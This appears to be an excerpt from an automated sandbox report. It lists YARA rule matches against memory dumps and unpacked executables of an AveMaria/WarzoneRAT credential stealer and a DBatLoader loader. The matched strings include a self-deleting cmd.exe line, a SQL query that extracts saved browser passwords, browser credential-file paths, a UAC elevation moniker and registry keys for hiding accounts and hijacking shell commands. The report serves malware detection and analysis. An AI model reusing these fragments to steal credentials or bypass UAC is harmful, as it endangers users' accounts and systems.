0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x7158:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x593c:$a2: SMTP Password 0x49f0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1ac0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x70a8:$a5: for /F "usebackq tokens=*" %%A in (" 0x53c8:$a6: \Torch\User Data\Default\Login Data 0x1be0:$a7: /n:%temp%\ellocnak.xml 0x5f28:$a8: "os_crypt":{"encrypted_key":" 0x1c10:$a9: Hey I'm Admin 0x5804:$a10: \logins.json 0x5ea0:$a11: Accounts\Account.rec0 0x6e30:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0xe428:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0xcc0c:$a2: SMTP Password 0xbcc0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x8d90:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xe378:$a5: for /F "usebackq tokens=*" %%A in (" 0xc698:$a6: \Torch\User Data\Default\Login Data 0x8eb0:$a7: /n:%temp%\ellocnak.xml 0xd1f8:$a8: "os_crypt":{"encrypted_key":" 0x8ee0:$a9: Hey I'm Admin 0xcad4:$a10: \logins.json 0xd170:$a11: Accounts\Account.rec0 0xe100:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000001A.00000002.1906996897.0000000002E51000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000001D.00000001.1902763804.0000000000554000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
00000003.00000003.1637088713.000002599966D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Process Memory Space: pointer.com PID: 2596	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: pointer.com PID: 2596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dbkyovyK.pif PID: 6644	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: dbkyovyK.pif PID: 6644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Kyvoykbd.PIF PID: 7344	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: Kyvoykbd.PIF PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dbkyovyK.pif PID: 7536	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: dbkyovyK.pif PID: 7536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dbkyovyK.pif PID: 7688	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: dbkyovyK.pif PID: 7688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 81 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.pointer.com.12661d48.9.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.pointer.com.12661d48.9.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4ba8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x338c:$a2: SMTP Password 0x2440:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4af8:$a5: for /F "usebackq tokens=*" %%A in (" 0x2e18:$a6: \Torch\User Data\Default\Login Data 0x3978:$a8: "os_crypt":{"encrypted_key":" 0x3254:$a10: \logins.json 0x38f0:$a11: Accounts\Account.rec0 0x4880:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a58:$a1: \Opera Software\Opera Stable\Login Data 0x2d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2608:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4ba8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x49ac:$str2: MsgBox.exe 0x4c14:$str4: \System32\cmd.exe 0x4880:$str6: Ave_Maria 0x40e0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x338c:$str8: SMTP Password 0x2608:$str11: \Google\Chrome\User Data\Default\Login Data 0x40ac:$str12: \sqlmap.dll
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x4c55:$r1: Classes\Folder\shell\open\command 0x4c78:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x4dd0:$pwsh: powershell 0x1f63:$s2: User-Agent: 0x215c:$s4: LdrLoadDll 0x19e4:$v6: start
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x6418:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4bfc:$a2: SMTP Password 0x3cb0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6368:$a5: for /F "usebackq tokens=*" %%A in (" 0x4688:$a6: \Torch\User Data\Default\Login Data 0xea0:$a7: /n:%temp%\ellocnak.xml 0x51e8:$a8: "os_crypt":{"encrypted_key":" 0xed0:$a9: Hey I'm Admin 0x4ac4:$a10: \logins.json 0x5160:$a11: Accounts\Account.rec0 0x60f0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x42c8:$a1: \Opera Software\Opera Stable\Login Data 0x45f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e78:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x6418:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x621c:$str2: MsgBox.exe 0x6484:$str4: \System32\cmd.exe 0x60f0:$str6: Ave_Maria 0x5950:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x4bfc:$str8: SMTP Password 0x3e78:$str11: \Google\Chrome\User Data\Default\Login Data 0x591c:$str12: \sqlmap.dll 0xd80:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp%
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x64c5:$r1: Classes\Folder\shell\open\command 0x64e8:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x5f0c:$s1: RDPClip 0x65e4:$s2: Grabber 0x60f0:$s3: Ave_Maria Stealer OpenSource 0x61f0:$s4: \MidgetPorn\workspace\MsgBox.exe 0xea0:$s6: /n:%temp%\ellocnak.xml 0xed0:$s7: Hey I'm Admin
14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x6640:$pwsh: powershell 0x37d3:$s2: User-Agent: 0x39cc:$s4: LdrLoadDll 0x3254:$v6: start
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x6418:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4bfc:$a2: SMTP Password 0x3cb0:$a3: select signon_realm, origin_url, username_value, password_value from logins 0xd80:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x6368:$a5: for /F "usebackq tokens=*" %%A in (" 0x4688:$a6: \Torch\User Data\Default\Login Data 0xea0:$a7: /n:%temp%\ellocnak.xml 0x51e8:$a8: "os_crypt":{"encrypted_key":" 0xed0:$a9: Hey I'm Admin 0x4ac4:$a10: \logins.json 0x5160:$a11: Accounts\Account.rec0 0x60f0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x42c8:$a1: \Opera Software\Opera Stable\Login Data 0x45f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e78:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	AveMaria_WarZone	unknown	unknown	0x6418:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x621c:$str2: MsgBox.exe 0x6484:$str4: \System32\cmd.exe 0x60f0:$str6: Ave_Maria 0x5950:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x4bfc:$str8: SMTP Password 0x3e78:$str11: \Google\Chrome\User Data\Default\Login Data 0x591c:$str12: \sqlmap.dll 0xd80:$str16: Elevation:Administrator!new 0xea0:$str17: /n:%temp%
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x64c5:$r1: Classes\Folder\shell\open\command 0x64e8:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x5f0c:$s1: RDPClip 0x65e4:$s2: Grabber 0x60f0:$s3: Ave_Maria Stealer OpenSource 0x61f0:$s4: \MidgetPorn\workspace\MsgBox.exe 0xea0:$s6: /n:%temp%\ellocnak.xml 0xed0:$s7: Hey I'm Admin
14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x6640:$pwsh: powershell 0x37d3:$s2: User-Agent: 0x39cc:$s4: LdrLoadDll 0x3254:$v6: start
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1ac80:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19464:$a2: SMTP Password 0x18518:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1d9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1abd0:$a5: for /F "usebackq tokens=*" %%A in (" 0x18ef0:$a6: \Torch\User Data\Default\Login Data 0x1db10:$a7: /n:%temp%\ellocnak.xml 0x19a50:$a8: "os_crypt":{"encrypted_key":" 0x1db40:$a9: Hey I'm Admin 0x1932c:$a10: \logins.json 0x199c8:$a11: Accounts\Account.rec0 0x1a958:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18b30:$a1: \Opera Software\Opera Stable\Login Data 0x18e58:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x186e0:$a3: \Google\Chrome\User Data\Default\Login Data
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1ac80:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1aa84:$str2: MsgBox.exe 0x1acec:$str4: \System32\cmd.exe 0x1a958:$str6: Ave_Maria 0x1a1b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x19464:$str8: SMTP Password 0x186e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1a184:$str12: \sqlmap.dll 0x1d9f0:$str16: Elevation:Administrator!new 0x1db10:$str17: /n:%temp%
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1ad2d:$r1: Classes\Folder\shell\open\command 0x1ad50:$k1: DelegateExecute
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1a774:$s1: RDPClip 0x1ae4c:$s2: Grabber 0x1a958:$s3: Ave_Maria Stealer OpenSource 0x1aa58:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1db10:$s6: /n:%temp%\ellocnak.xml 0x1db40:$s7: Hey I'm Admin
23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1aea8:$pwsh: powershell 0x1803b:$s2: User-Agent: 0x18234:$s4: LdrLoadDll 0x17abc:$v6: start
14.2.dbkyovyK.pif.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.dbkyovyK.pif.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.2.dbkyovyK.pif.400000.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.2.dbkyovyK.pif.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
14.2.dbkyovyK.pif.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
14.2.dbkyovyK.pif.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
14.2.dbkyovyK.pif.400000.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
29.1.dbkyovyK.pif.400000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.1.dbkyovyK.pif.400000.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
29.1.dbkyovyK.pif.400000.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x1c680:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1ae64:$a2: SMTP Password 0x19f18:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x1c5d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1a8f0:$a6: \Torch\User Data\Default\Login Data 0x1b450:$a8: "os_crypt":{"encrypted_key":" 0x1ad2c:$a10: \logins.json 0x1b3c8:$a11: Accounts\Account.rec0 0x1c358:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
29.1.dbkyovyK.pif.400000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a530:$a1: \Opera Software\Opera Stable\Login Data 0x1a858:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a0e0:$a3: \Google\Chrome\User Data\Default\Login Data
29.1.dbkyovyK.pif.400000.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1c680:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1c484:$str2: MsgBox.exe 0x1c6ec:$str4: \System32\cmd.exe 0x1c358:$str6: Ave_Maria 0x1bbb8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x1ae64:$str8: SMTP Password 0x1a0e0:$str11: \Google\Chrome\User Data\Default\Login Data 0x1bb84:$str12: \sqlmap.dll
29.1.dbkyovyK.pif.400000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1c72d:$r1: Classes\Folder\shell\open\command 0x1c750:$k1: DelegateExecute
29.1.dbkyovyK.pif.400000.3.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x1c8a8:$pwsh: powershell 0x19a3b:$s2: User-Agent: 0x19c34:$s4: LdrLoadDll 0x194bc:$v6: start
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x4ba8:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x338c:$a2: SMTP Password 0x2440:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x4af8:$a5: for /F "usebackq tokens=*" %%A in (" 0x2e18:$a6: \Torch\User Data\Default\Login Data 0x3978:$a8: "os_crypt":{"encrypted_key":" 0x3254:$a10: \logins.json 0x38f0:$a11: Accounts\Account.rec0 0x4880:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a58:$a1: \Opera Software\Opera Stable\Login Data 0x2d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2608:$a3: \Google\Chrome\User Data\Default\Login Data
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x4ba8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x49ac:$str2: MsgBox.exe 0x4c14:$str4: \System32\cmd.exe 0x4880:$str6: Ave_Maria 0x40e0:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x338c:$str8: SMTP Password 0x2608:$str11: \Google\Chrome\User Data\Default\Login Data 0x40ac:$str12: \sqlmap.dll
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x4c55:$r1: Classes\Folder\shell\open\command 0x4c78:$k1: DelegateExecute
14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x4dd0:$pwsh: powershell 0x1f63:$s2: User-Agent: 0x215c:$s4: LdrLoadDll 0x19e4:$v6: start
8.2.pointer.com.126450d8.10.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.2.pointer.com.126450d8.10.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.2.pointer.com.126450d8.10.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x19280:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17a64:$a2: SMTP Password 0x1bff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191d0:$a5: for /F "usebackq tokens=*" %%A in (" 0x1c110:$a7: /n:%temp%\ellocnak.xml 0x18050:$a8: "os_crypt":{"encrypted_key":" 0x1c140:$a9: Hey I'm Admin 0x1792c:$a10: \logins.json 0x17fc8:$a11: Accounts\Account.rec0 0x18f58:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.pointer.com.126450d8.10.unpack	AveMaria_WarZone	unknown	unknown	0x19280:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19084:$str2: MsgBox.exe 0x192ec:$str4: \System32\cmd.exe 0x18f58:$str6: Ave_Maria 0x187b8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17a64:$str8: SMTP Password 0x18784:$str12: \sqlmap.dll 0x1bff0:$str16: Elevation:Administrator!new 0x1c110:$str17: /n:%temp%
8.2.pointer.com.126450d8.10.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x1bff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.pointer.com.126450d8.10.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x1932d:$r1: Classes\Folder\shell\open\command 0x19350:$k1: DelegateExecute
8.2.pointer.com.126450d8.10.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x18d74:$s1: RDPClip 0x1944c:$s2: Grabber 0x18f58:$s3: Ave_Maria Stealer OpenSource 0x19058:$s4: \MidgetPorn\workspace\MsgBox.exe 0x1c110:$s6: /n:%temp%\ellocnak.xml 0x1c140:$s7: Hey I'm Admin
29.1.dbkyovyK.pif.400000.3.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
